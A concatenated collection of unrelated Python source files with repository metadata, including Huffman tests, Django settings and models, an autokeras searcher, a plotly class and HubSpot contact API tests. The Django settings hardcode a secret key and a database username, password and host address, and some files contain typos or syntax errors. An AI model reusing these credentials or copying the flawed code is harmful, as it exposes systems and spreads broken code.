{'a': '001', 's': '100', 'd': '010', 'f': '1011', \
';': '1101', 'k': '011', 'l': '11100', 'j': \
'11111', ' ': '11000', 'i': '000', 'r': '11101',\
'F': '1010', 'D': '11001', 'g': '11110'})
def test_huffman_3(self):
sent = 'asdf;k;lkjasdfk'; codes = dict(); root = huffman(sent)
for ch in sent:
codes[ch] = get_huffman_code(ch, root)
self.assertDictEqual(codes, {'a': '100', 's': '011', 'd': '101', \
'f': '010', ';': '111', 'k': '00', \
'l': '1101', 'j': '1100'})
def test_huffman_4(self):
sent = 'testing this string'; codes = dict(); root = huffman(sent)
for ch in sent:
codes[ch] = get_huffman_code(ch, root)
self.assertDictEqual(codes, {'t': '01', 'e': '10110', 's': '111', \
'i': '110', 'n': '100', 'g': '001', ' ': '000', 'h': '10111', \
'r': '1010'} )
def test_huffman_5(self):
sent = 'StringTeessttt'; codes = dict(); root = huffman(sent)
for ch in sent:
codes[ch] = get_huffman_code(ch, root)
self.assertDictEqual(codes, {'S': '0100', 't': '11', 'r': \
'1001', 'i': '1011', 'n': '1000', 'g': '1010', 'T': '0101', \
'e': '011', 's': '00'})
if __name__ == '__main__':
unittest.main()
|
[
"noreply@github.com"
] |
brianphan90.noreply@github.com
|
2805e23589388f98356cdfb31d8b2c7f0ac9e81e
|
862cde78fa4b2e7a8043276d2a78a51715d66cf9
|
/CSC-Python-2021-1/I/I.py
|
174e25cfc98aece92a23ff81be78e2e0cc09223e
|
[
"MIT"
] |
permissive
|
coldnegative/CSC-Python-2021
|
8c21c639f4dbf0f7c337349fdc8d6300b45abc9d
|
aee9acb4e1fc3afab4d88d6c6a9a22363f52b321
|
refs/heads/main
| 2023-03-06T23:46:37.075471
| 2021-02-21T08:38:13
| 2021-02-21T08:38:13
| 339,986,197
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 968
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
def writer(line):
with open("output.txt", "a") as f:
f.write(line)
def main():
"""Дан секвенированный геном какого-либо вируса.
Нужно определить количество нуклеотидов a c g t
в геноме в таком порядке."""
# Code goes over here.
count_a = 0
count_c = 0
count_g = 0
count_t = 0
with open("input.txt") as f:
for line in f:
for x in "".join(line[10:].split()):
if x == "a":
count_a += 1
elif x == "c":
count_c += 1
elif x == "g":
count_g += 1
elif x == "t":
count_t += 1
else:
writer("{} {} {} {}\n".format(count_a, count_c, count_g, count_t))
return 0
if __name__ == "__main__":
main()
|
[
"vologinmp@gmail.com"
] |
vologinmp@gmail.com
|
8edce78411cf51da5c3597e357ac88e57e917f26
|
319e87285382cf54c844cb1ff80ffdcb4a4b4b70
|
/algorithm/others/coin_change_hieu.py
|
d6437626d91c35d4a986c758329c76e814cceb8b
|
[] |
no_license
|
chaupmcs/python_practice
|
5473926a29661ec8da21fba4a41dce8b5581350d
|
f25105d0aea40ebc1015fe8e39dcb0cd1dcd044d
|
refs/heads/master
| 2020-05-27T10:34:52.409083
| 2019-05-26T03:55:51
| 2019-05-26T03:55:51
| 188,584,639
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 950
|
py
|
"""
Created by chaupm at 2019-05-17
"""
import math
class Solution:
def coinChange(self, coins, amount):
def countStep(subAmount, map):
min_of_list = math.inf
for coin in coins:
if (subAmount - coin) in map:
min_of_list = min(map[(subAmount - coin)], min_of_list)
map[subAmount] = min_of_list + 1
if amount == 0:
return 0
map = {}
for coin in coins:
map[coin] = 1
for i in range(1, amount + 1):
if i not in coins:
countStep(i, map)
return map.get(amount, -1)
def a(map_, list_ = None):
if list_ is not None:
list_.append("haha")
map_["xx"] = 100
map___ = {10:10000}
list___ = ["aa"]
a(map___, list___)
a(map___, list___)
print(map___)
print(list___)
coins = [1,2,5]
amount = 11
test = Solution()
print(test.coinChange(coins, amount))
|
[
"chaupm.cs@gmail.com"
] |
chaupm.cs@gmail.com
|
0752d8ac03b45b74c1e14728a331fb012029a3c9
|
05a70c12df808455100598d8a6fdb5635c641ab8
|
/Ago-Dic-2019/JOSE ONOFRE/SegundoParcial/ApiDisco.py
|
dabba11527d0d7d17a81d67cbb7e88b14651cfd4
|
[
"MIT"
] |
permissive
|
Jonathan-aguilar/DAS_Sistemas
|
991edcc929c33ba9bb8bc84e741b55c10a8420a3
|
4d02efc64161871084df1bff258112351e5d1241
|
refs/heads/development
| 2023-07-24T12:26:54.698452
| 2021-09-02T20:52:26
| 2021-09-02T20:52:26
| 289,764,892
| 1
| 0
|
MIT
| 2021-09-02T20:52:27
| 2020-08-23T20:54:55
|
Python
|
UTF-8
|
Python
| false
| false
| 973
|
py
|
import musicbrainzngs
import pprint
import sqlite3
import ClaseDisco
import BDMusic
musicbrainzngs.set_useragent('musicbrainzngs','2.0')
#r = musicbrainzngs.search_artists(query='area.name:Los Angeles',limit=5)
r = musicbrainzngs.search_releases(type = "group", country = 'US', tag=['rock','metal'],limit= 100)
for discos in r['release-list']:
if 'status' in discos:
stat = discos['status']
else:
stat = 'Unofficial'
disc = ClaseDisco.Disc(id = discos['artist-credit'][0]['artist']['id'],name = discos['artist-credit'][0]['artist']['name'], country = discos['country'], date = discos['date'], status = stat)
#pprint.pprint(discos['artist-credit'][0]['artist']['id'])
#pprint.pprint(discos['artist-credit'][0]['artist']['name'])
#pprint.pprint(discos['country'])
#pprint.pprint(discos['date'])
#pprint.pprint(discos['status'])
print(disc)
#BDMusic.insertarD(disc)
BDMusic.VisualizarD
#pprint.pprint(r)
|
[
"onofreeduardos@gmail.com"
] |
onofreeduardos@gmail.com
|
5adac1321b757ffa1b6144b1fdd7c78c5b76e4d6
|
ff5892487c262ce845a9996a282d3a2fdb1a3b15
|
/URI_2651.py
|
af43f3470162a3a2559044957f9345503771e9ee
|
[] |
no_license
|
dankoga/URIOnlineJudge--Python-3.9
|
d424a47671f106d665a4e255382fc0ec3059096a
|
f1c99521caeff59be0843af5f63a74013b63f7f0
|
refs/heads/master
| 2023-07-15T08:32:11.040426
| 2021-09-03T13:27:17
| 2021-09-03T13:27:17
| 393,991,461
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 102
|
py
|
name = input().lower()
if 'zelda' in name:
print('Link Bolado')
else:
print('Link Tranquilo')
|
[
"dankoga2@gmail.com"
] |
dankoga2@gmail.com
|
fe854d01dea7173d612f68b1b08c4a296e3c2832
|
6599d86684020139574241cf88ab0966bfd11f27
|
/nas/greedy.py
|
d96a24441bd11756881fb61e4dd11c9622a3e5cf
|
[
"MIT"
] |
permissive
|
kepengxu/autokeras_cooper
|
54026798a038b469fff7a3db15583f7eb9e7c24b
|
960098d5e0691a0c16a16fc7641b23a29fd17f20
|
refs/heads/master
| 2022-11-25T09:57:20.377158
| 2019-03-25T13:41:02
| 2019-03-25T13:41:02
| 177,594,139
| 0
| 1
|
NOASSERTION
| 2022-11-03T14:02:10
| 2019-03-25T13:40:29
|
Python
|
UTF-8
|
Python
| false
| false
| 3,785
|
py
|
import time
from copy import deepcopy
from autokeras.custom_queue import Queue
from autokeras.bayesian import contain, SearchTree
from autokeras.net_transformer import transform
from autokeras.search import Searcher
class GreedyOptimizer:
def __init__(self, searcher, metric):
self.searcher = searcher
self.metric = metric
def generate(self, descriptors, timeout, sync_message):
"""Generate new neighbor architectures from the best model.
Args:
descriptors: All the searched neural architectures.
timeout: An integer. The time limit in seconds.
sync_message: the Queue for multiprocessing return value.
Returns:
out: A list of 2-elements tuple. Each tuple contains
an instance of Graph, a morphed neural network with weights
and the father node id in the search tree.
"""
out = []
start_time = time.time()
descriptors = deepcopy(descriptors)
if isinstance(sync_message, Queue) and sync_message.qsize() != 0:
return out
model_id = self.searcher.get_neighbour_best_model_id()
graph = self.searcher.load_model_by_id(model_id)
father_id = model_id
for temp_graph in transform(graph):
if contain(descriptors, temp_graph.extract_descriptor()):
continue
out.append((deepcopy(temp_graph), father_id))
remaining_time = timeout - (time.time() - start_time)
if remaining_time < 0:
raise TimeoutError
return out
class GreedySearcher(Searcher):
""" Class to search for neural architectures using Greedy search strategy.
Attribute:
optimizer: An instance of BayesianOptimizer.
"""
def __init__(self, n_output_node, input_shape, path, metric, loss, generators, verbose,
trainer_args=None,
default_model_len=None,
default_model_width=None):
super(GreedySearcher, self).__init__(n_output_node, input_shape,
path, metric, loss, generators,
verbose, trainer_args, default_model_len,
default_model_width)
self.optimizer = GreedyOptimizer(self, metric)
def generate(self, multiprocessing_queue):
"""Generate the next neural architecture.
Args:
multiprocessing_queue: the Queue for multiprocessing return value.
pass into the search algorithm for synchronizing
Returns:
results: A list of 2-element tuples. Each tuple contains an instance of Graph,
and anything to be saved in the training queue together with the architecture
"""
remaining_time = self._timeout - time.time()
results = self.optimizer.generate(self.descriptors, remaining_time,
multiprocessing_queue)
if not results:
new_father_id = 0
generated_graph = self.generators[0](self.n_classes, self.input_shape). \
generate(self.default_model_len, self.default_model_width)
results.append((generated_graph, new_father_id))
return results
def update(self, other_info, model_id, graph, metric_value):
return
def load_neighbour_best_model(self):
return self.load_model_by_id(self.get_neighbour_best_model_id())
def get_neighbour_best_model_id(self):
if self.metric.higher_better():
return max(self.neighbour_history, key=lambda x: x['metric_value'])['model_id']
return min(self.neighbour_history, key=lambda x: x['metric_value'])['model_id']
|
[
"xkp793003821@outlook.com"
] |
xkp793003821@outlook.com
|
96156d51e8cf1c52991bca0587c7c4bec623db93
|
3d5ff3f273cf5bf444db948e3d220e99b718217b
|
/books/models.py
|
a8fa20e1e8924101fbce1be0ab4ab46c052d8856
|
[] |
no_license
|
xinmang/myblog
|
b481dd3323dc5d687e30a7f50a9720899f517778
|
3e7f9ce5dcd05d83338f7c707e013ac2107c505d
|
refs/heads/master
| 2020-03-17T14:50:01.784759
| 2018-05-16T15:35:37
| 2018-05-16T15:35:37
| 133,687,557
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,266
|
py
|
from django.db import models
# Create your models here.
class Publisher(models.Model):
publisher_name = models.CharField(max_length=30)
address = models.CharField(max_length=50)
city = models.CharField(max_length=60)
province = models.CharField(max_length=30)
country = models.CharField(max_length=50)
website = models.URLField()
class Meta:
ordering = ('publisher_name',)
def __str__(self):
return self.publisher_name
class Auther(models.Model):
SEX = (
('M','Male'),
('F','Female'),
)
first_name = models.CharField(max_length=30)
last_name = models.CharField(max_length=30)
email_address = models.EmailField()
age = models.IntegerField()
sex = models.CharField(max_length=1,choices=SEX)
def __str__(self):
return '%s %s'%(self.first_name,self.last_name)
class Book(models.Model):
name = models.CharField(max_length=100)
pagenum = models.IntegerField()
price = models.DecimalField(max_digits=10,decimal_places=2)
auther = models.ManyToManyField(Auther)
publisher_name = models.ForeignKey(Publisher)
publication_time = models.DateField()
def __str__(self):
return self.name
|
[
"xinmang@126.com"
] |
xinmang@126.com
|
d0d96ffa0a203583d64e7b115aebcb79275c7f5b
|
a4a4d4b20aaaf37f4ada190e2e1840ae09c835a9
|
/generator/group.py
|
c636120d033dc53344570ddcfe5d713c709d712a
|
[
"Apache-2.0"
] |
permissive
|
SvetlanaPopova/ironpython_training
|
9196988bbfcb402f06f81e5ed46ed41c2e0141ad
|
03bfd2762421267f428529193e8f7903d366fbf0
|
refs/heads/master
| 2021-01-10T21:21:08.299364
| 2015-07-29T17:35:22
| 2015-07-29T17:35:22
| 38,529,793
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,249
|
py
|
__author__ = 'User'
from model.group import Group
import random
import string
import os.path
import getopt
import sys
import time
import clr
clr.AddReferenceByName('Microsoft.Office.Interop.Excel') #, Version=0.0.0.0, Culture=neutral, PublicKeyToken=')
from Microsoft.Office.Interop import Excel
try:
opts, args = getopt.getopt(sys.argv[1:], "n:f:", ["number of groups", "file"])
except getopt.GetoptError as err:
getopt.usage()
sys.exit(2)
n = 5
f = "data/groups.xlsx"
for o, a in opts:
if o == "-n":
n = int(a)
elif o == "-f":
f = a
def random_string (prefix, maxlen):
symbols = string.ascii_letters + string.digits + string.punctuation + " "*10
return prefix + "".join([random.choice(symbols) for i in range(random.randrange(maxlen))])
testdata = [Group(name="")] + [
Group(name=random_string("name", 10))
for i in range(n)
]
file = os.path.join(os.path.dirname(os.path.abspath(__file__)), "..", f)
excel = Excel.AppliationClass()
excel.Visible = True
workbook = excel.Workbooks.add()
sheet = workbook.ActiveSheet()
for i in range(len(testdata)):
sheet.Range["A%s" % (i+1)].Value2=testdata[i].name
workbook.SaveAs(file)
time.sleep(10)
excel.Quit()
|
[
"sv_popova@bk.ru"
] |
sv_popova@bk.ru
|
20398891f864a11de2e3bee99bdc0ac437de2638
|
7239d389894613ef132edb1198a4f47cb2b65f92
|
/packages/python/plotly/plotly/graph_objs/scatterpolar/marker/colorbar/_title.py
|
9e4e94f0bf6dbe97eabb67d95ad3967be6f5d3d3
|
[
"MIT"
] |
permissive
|
fast3dd13sa/plotly.py
|
2169417b72481ff2937b5a9ce90d426cd1cccd80
|
e778c6b5e6ae9665d7a5e2ddb666f43806df3959
|
refs/heads/master
| 2022-04-26T01:11:46.345181
| 2020-04-27T19:49:56
| 2020-04-27T19:49:56
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,724
|
py
|
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Title(_BaseTraceHierarchyType):
# class properties
# --------------------
_parent_path_str = "scatterpolar.marker.colorbar"
_path_str = "scatterpolar.marker.colorbar.title"
_valid_props = {"font", "side", "text"}
# font
# ----
@property
def font(self):
"""
Sets this color bar's title font. Note that the title's font
used to be set by the now deprecated `titlefont` attribute.
The 'font' property is an instance of Font
that may be specified as:
- An instance of :class:`plotly.graph_objs.scatterpolar.marker.colorbar.title.Font`
- A dict of string/value properties that will be passed
to the Font constructor
Supported dict properties:
color
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The Chart Studio Cloud (at
https://chart-studio.plotly.com or on-premise)
generates images on a server, where only a
select number of fonts are installed and
supported. These include "Arial", "Balto",
"Courier New", "Droid Sans",, "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
size
Returns
-------
plotly.graph_objs.scatterpolar.marker.colorbar.title.Font
"""
return self["font"]
@font.setter
def font(self, val):
self["font"] = val
# side
# ----
@property
def side(self):
"""
Determines the location of color bar's title with respect to
the color bar. Note that the title's location used to be set by
the now deprecated `titleside` attribute.
The 'side' property is an enumeration that may be specified as:
- One of the following enumeration values:
['right', 'top', 'bottom']
Returns
-------
Any
"""
return self["side"]
@side.setter
def side(self, val):
self["side"] = val
# text
# ----
@property
def text(self):
"""
Sets the title of the color bar. Note that before the existence
of `title.text`, the title's contents used to be defined as the
`title` attribute itself. This behavior has been deprecated.
The 'text' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["text"]
@text.setter
def text(self, val):
self["text"] = val
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
font
Sets this color bar's title font. Note that the title's
font used to be set by the now deprecated `titlefont`
attribute.
side
Determines the location of color bar's title with
respect to the color bar. Note that the title's
location used to be set by the now deprecated
`titleside` attribute.
text
Sets the title of the color bar. Note that before the
existence of `title.text`, the title's contents used to
be defined as the `title` attribute itself. This
behavior has been deprecated.
"""
def __init__(self, arg=None, font=None, side=None, text=None, **kwargs):
"""
Construct a new Title object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of :class:`plotly.graph_objs.scatterpolar.m
arker.colorbar.Title`
font
Sets this color bar's title font. Note that the title's
font used to be set by the now deprecated `titlefont`
attribute.
side
Determines the location of color bar's title with
respect to the color bar. Note that the title's
location used to be set by the now deprecated
`titleside` attribute.
text
Sets the title of the color bar. Note that before the
existence of `title.text`, the title's contents used to
be defined as the `title` attribute itself. This
behavior has been deprecated.
Returns
-------
Title
"""
super(Title, self).__init__("title")
if "_parent" in kwargs:
self._parent = kwargs["_parent"]
return
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.scatterpolar.marker.colorbar.Title
constructor must be a dict or
an instance of :class:`plotly.graph_objs.scatterpolar.marker.colorbar.Title`"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("font", None)
_v = font if font is not None else _v
if _v is not None:
self["font"] = _v
_v = arg.pop("side", None)
_v = side if side is not None else _v
if _v is not None:
self["side"] = _v
_v = arg.pop("text", None)
_v = text if text is not None else _v
if _v is not None:
self["text"] = _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
|
[
"noreply@github.com"
] |
fast3dd13sa.noreply@github.com
|
7911c77860d4e664161d0c1fa934ba137de8f04d
|
6e790a743b4fd4ebecd82124d72f0628ef81f179
|
/users/serializers.py
|
b3fffd1ff94dded25cf0a540190266e684baf40a
|
[] |
no_license
|
KJablonski08/building_futures_django
|
55e62f4b60f6faab6faeba92705d7ad1c7f94b40
|
94140d8bd728852ea7fcb3c0d720b90dd2983178
|
refs/heads/main
| 2023-02-16T17:18:38.911551
| 2021-01-19T02:49:07
| 2021-01-19T02:49:07
| 320,074,473
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 316
|
py
|
from djoser.serializers import UserCreateSerializer, UserSerializer
from rest_framework import serializers
from . import models
class UserCreateSerializer(UserCreateSerializer):
class Meta(UserCreateSerializer.Meta):
model = models.User
fields = ('id', 'email', 'username', 'password', 'name')
|
[
"kjablonski08@gmail.com"
] |
kjablonski08@gmail.com
|
87e1c4b4185b8e365e5367441a058d90688eb348
|
6b62b8a84a7aba88d7404fc6270c00ac6ecc38e8
|
/Python/1_Python Projects/1.county_project/Automation Project Output Files/untitled-1.py
|
bc3b7d742b7c836a2cfe542c531355d43ab0b7d3
|
[] |
no_license
|
bharatpk/Aroha_Tecnology_Workspace
|
fbeb5a1b1ef846c25f094bfa2398c1b15889bd85
|
ebd6727b2ae637e7256531e3e48d663af1fd3932
|
refs/heads/master
| 2021-01-23T08:52:32.463143
| 2015-08-05T12:23:19
| 2015-08-05T12:23:19
| 39,793,244
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 381
|
py
|
import glob
class merge :
def mergingfiles():
read_files = glob.glob("*.txt")
with open("result.text", 'a') as outfile:
for f in read_files:
with open(f, "r") as infile:
outfile.write('\n'+infile.read())
mergingfiles()
|
[
"bharatpk0@gmail.com"
] |
bharatpk0@gmail.com
|
2bd24e25c4900d6cefe399aa6ac942dc2c4f9795
|
2b4ed6bab74a924cd4286b6714d763d0fcb2595e
|
/polls/urls.py
|
35ca91de5648fe61f1d8af90fba20e2d82d1dda4
|
[] |
no_license
|
karthikravinatha/mysite-demo
|
6e8e764ff477821b95b4a3df2d0a25081b438509
|
79126ca90111a016fd9e1e99e48f57ea15bb055d
|
refs/heads/master
| 2020-08-19T18:26:46.895233
| 2019-10-18T09:10:40
| 2019-10-18T09:10:40
| 215,942,818
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 309
|
py
|
from django.urls import path
from . import views
app_name = 'polls'
urlpatterns = [
path('',views.index,name='index'),
path('<int:question_id>/',views.detail,name='detail'),
path('<int:question_id>/result',views.results,name='results'),
path('<int:question_id>/vote',views.vote,name='vote'),
]
|
[
"kar@gmail.com"
] |
kar@gmail.com
|
dc6a678d7a3dfe622eefcf7d4dde2c4c36e08b56
|
3e4b01aa9ee1892726519cdca30336764fb32c46
|
/build/lib/octopus/plotting_module.py
|
40a50bc2ad194ababca1c39ee6ddb268a7600813
|
[] |
no_license
|
copperwire/cephalopod
|
8376902d22871e1358b304dc12df029553f2b7e1
|
d06a8c65d4084ab3a3c5d582b9a63f705e6445b9
|
refs/heads/master
| 2021-01-15T15:25:47.312018
| 2016-06-14T23:39:34
| 2016-06-14T23:39:34
| 53,581,103
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,815
|
py
|
from octopus import file_handler
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import host_subplot
import mpl_toolkits.axisartist as AA
import numpy as np
class plotter:
def __init__(self, filename):
self.filename = filename
def pathfinder(self):
"""Find full path to filename """
def plot_machine(self):
class_instance = file_handler(self.filename)
class_instance.file_iteration()
data_sets = class_instance.data_conversion()
names = getattr(class_instance, "substances")
if len(names) > 2:
host = host_subplot(111, axes_class = AA.Axes)
plt.subplots_adjust(right = 0.75)
par1 = host.twinx()
par2 = host.twinx()
host.set_yscale("log")
par1.set_yscale("log")
par2.set_yscale("log")
offset = 60
new_fixed_axis = par2.get_grid_helper().new_fixed_axis
par2.axis["right"] = new_fixed_axis(loc="right",
axes=par2,
offset=(offset, 0))
par2.axis["right"].toggle(all = True)
host.set_xlabel(data_sets[0]["x_unit"])
plotty_things = [host, par1, par2]
for data_set, name, things in zip(data_sets, names, plotty_things):
x_val = data_set["data"]["x"]
y_val = data_set["data"]["y"]
x_unit = data_set["x_unit"]
y_unit = data_set["y_unit"]
things.set_ylabel(y_unit)
things.plot(x_val, y_val, label = data_set["sample element"])
plt.legend()
plt.show()
else:
data_set = data_sets[0]
x_val = data_set["data"][0]
y_val = data_set["data"][1]
x_val = x_val.copy(order = "C")
x_unit = data_set["x_unit"]
y_unit = data_set["y_unit"]
plt.semilogy(x_val, y_val, label = data_set["sample info"][2], nonposy = "clip")
plt.xlabel(x_unit)
plt.ylabel(y_unit)
plt.legend()
plt.show()
|
[
"solli.robert@gmail.com"
] |
solli.robert@gmail.com
|
8b834d6d57bdf5ca4ab43efb2e26e1f0348cd261
|
3c80780a7549e23312dd2e134503bda9a1a068a4
|
/DjangoWebProject5/home/views.py
|
36d531aabdc125e9f2ef5c3967371eae8cadcefe
|
[] |
no_license
|
halilibrahimm/Django-Post-Web-Application
|
c77333b9baa8341def1e60ea3034217f3c8670ff
|
e7f0b228c97b75fa57b5c7ef6f46c65e6539f148
|
refs/heads/master
| 2020-04-11T00:27:42.448132
| 2018-12-11T21:39:56
| 2018-12-11T21:39:56
| 161,387,177
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 279
|
py
|
from django.shortcuts import render,HttpResponse
def home_view(request):
if request.user.is_authenticated():
context={'isim':'Halil'}
else:
context={'isim':'Misafir'}
return render(request,'home.html',context)
# Create your views here.
|
[
"email@example.com"
] |
email@example.com
|
9bb4920df1debf2188236368aa71663f6901038b
|
96aa81997f7f59f3c5062a3c5a9424d351762c77
|
/covid19/covid19/settings.py
|
0c1a52d196628bd4faaa7d07c159b020b92883b0
|
[
"MIT"
] |
permissive
|
geumilbae/covid19
|
4c138868b06565003ed0b07e45b693c19eabbe85
|
84b29aff9500ee84586172ced75974ba90a25def
|
refs/heads/master
| 2022-11-07T23:42:15.886638
| 2020-06-23T03:02:26
| 2020-06-23T03:02:26
| 274,110,353
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,057
|
py
|
"""
Django settings for covid19 project.
Generated by 'django-admin startproject' using Django 3.0.7.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
import sys
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'drdo)(lbc3*aa=7112zc%#byds@j@)c#c#_qy4_a8!ib)$#pg@'
# SECURITY WARNING: don't run with debug turned on in production!
if 'DJANGO_DEBUG_FALSE' in os.environ:
DEBUG = False
SECRET_KEY = os.environ['DJANGO_SECRET_KEY']
ALLOWED_HOSTS = [os.environ['SITENAME']]
else:
DEBUG = True
SECRET_KEY = 'insecure-key-for-dev'
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_extensions',
'rest_framework',
'allauth',
'drf_yasg',
'path',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'covid19.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'covid19.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
if sys.platform == 'linux':
host = 'localhost'
elif sys.platform == 'darwin':
host = '192.168.219.108'
else:
host = '116.39.106.25'
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'covid19_db',
'USER': 'remote_bot_covid19',
'PASSWORD': 'Bot_2020',
'HOST': host,
'PORT': '3306',
'OPTIONS': {
'init_command': "SET sql_mode='STRICT_TRANS_TABLES'",
'charset': 'utf8mb4',
'use_unicode': True,
},
'TEST': {
'NAME': 'test_covid19_db',
'CHARSET': 'utf8mb4',
'COLLATION': 'utf8mb4_general_ci',
}
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Seoul'
USE_I18N = True
USE_L10N = True
USE_TZ = False
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
STATIC_URL = '/static/'
STATICFILES_DIR = {
os.path.join(BASE_DIR, 'static')
}
|
[
"geumil.bae@projectybl.com"
] |
geumil.bae@projectybl.com
|
4730516c37bcf18d3631c49bfe2d9c3476a0f8ec
|
a96f623c237985fd77927f55c9b3335e536117a6
|
/hapi/test/test_contacts.py
|
1ff4ad3b5f82101d23633ba53909ddea2b554764
|
[
"Apache-2.0"
] |
permissive
|
jpetr/hapipy
|
47793955175118cc9427681d5dd3b369527da0a3
|
07db3bb7280654a6021ab3e95aad3cdca2c5cedc
|
refs/heads/master
| 2020-12-25T05:26:49.270540
| 2012-06-12T22:32:49
| 2012-06-12T22:32:49
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,466
|
py
|
import unittest2
import helper
import simplejson as json
from nose.plugins.attrib import attr
class ContactsClientTest(unittest2.TestCase):
""" Unit tests for the HubSpot Clients API Python client.
This file contains some unittest tests for the Clients API.
It is not intended to be exhaustive, just simple exercises and
illustrations.
All these methods work in similar ways. First, make a variable with
required input. Pass it into the method being tested. Check if that
method returned something. Display results. Clean up.
Additional tests and other improvements welcome.
TODO: these tests have not been run before, so they may not pass
Questions, comments, etc: http://developers.hubspot.com
"""
def setUp(self):
self.client = ContactsClient(**helper.get_options())
def tearDown(self):
pass
@attr('api')
def test_get_contact(self):
# make a contact to mess with
dummy_contact = json.dumps(dict(
email = 'blaghblagh@blagh.com',
firstname = 'Robert',
lastname = 'Paulson',
website = 'www.wxyz.com'
company = 'Paper Street Soap Company',
phone = '1369121518',
city = 'Anytown',
state = 'The moon',
zip = 'space'
))
created_contacts = self.client.create_contact(dummy_contact)
# this is the contact's id the test will look for
test_id = created_contacts['vid']
# try and get it
contacts_recieved = self.client.get_contact(test_id)
# make sure you got at least one contact
self.assertTrue(contacts_recieved['vid'])
print "Got these contacts by their id: %s" % json.dumps(contacts_recieved)
@attr('api')
def test_get_contact_by_email(self):
# create a contact to get
dummy_contact = json.dumps(dict(
email = 'yetAnother@fakeEmail.com',
firstname = 'Imaginary',
lastname = 'Friend',
website = 'nonexistant.com',
company = 'Unproductive Corp',
phone = '1231231231',
address = '25 Danger road',
city = 'Stormwind',
state = 'Azeroth',
zip = '71200'
))
returned_contact = self.client.create_contact(dummy_contact)
# make sure it was actually made
self.assertTrue(returned_contact['vid'])
# this is the contact's email the test will be looking for
test_email = returned_contact['email']
# try and get it
contacts_recieved = self.client.get_by_email(test_email)
# see if you got something
self.assertTrue(contacts_recieved['vid'])
print "Got these contacts by their email: %s" % json.dumps(contacts_recieved)
# if it found it, clean up
self.client.delete_contact(contacts_recieved['vid'])
@attr('api')
def test_create_contact(self):
# this will be the information of the contact being made. It is JSON, as required according to the API
dummy_contact = json.dumps(dict(
email = 'silly@thisisntreal.com',
firstname = 'Silly',
lastname = 'Testman',
website = 'thisisntreal.com',
company = 'Fake Industries',
phone = '1234567890',
address = '123 fake street',
city = 'Springfield',
state = 'Ohiyamaude',
zip = '12345'
))
